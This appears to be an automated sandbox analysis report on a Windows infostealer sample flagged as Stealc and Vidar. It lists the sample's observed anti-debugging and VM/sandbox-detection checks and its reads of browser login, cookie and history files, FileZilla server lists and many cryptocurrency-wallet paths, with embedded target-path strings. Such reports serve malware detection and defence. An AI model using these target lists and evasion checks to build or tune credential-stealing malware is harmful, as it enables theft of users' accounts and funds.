Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00AC4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_00ABDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_00ABE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00AC3EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00ABF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AB16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00AB16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_00ABBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_00AC38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_00ABED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00AC4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00ABDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00ABDE10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AB1160 GetSystemInfo,ExitProcess,

0_2_00AB1160

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: JKEGDHCF.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: JKEGDHCF.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: JKEGDHCF.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: JKEGDHCF.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JKEGDHCF.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2426216663.0000000000612000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: JKEGDHCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: global block list test formVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: JKEGDHCF.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: JKEGDHCF.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: JKEGDHCF.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: JKEGDHCF.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: JKEGDHCF.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: JKEGDHCF.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: JKEGDHCF.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: JKEGDHCF.0.dr	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: JKEGDHCF.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: JKEGDHCF.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: JKEGDHCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: JKEGDHCF.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: JKEGDHCF.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48224
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48227
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48239
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-49414
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48244
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-48279

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB35FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6CB35FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AB45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_00AB45C0

Source: C:\Users\user\Desktop\file.exe

0_2_00AC9860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC9750 mov eax, dword ptr fs:[00000030h]

0_2_00AC9750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,

0_2_00AC78E0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6CB0B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6CB0B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00AC9600

Source: file.exe, file.exe, 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: DProgram Manager

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00AC7B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00AC7980

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00AC7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00AC7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00AC7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2426216663.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2151981046.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 6432, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2426216663.0000000000646000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.json.*
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2426216663.0000000000629000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.l

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
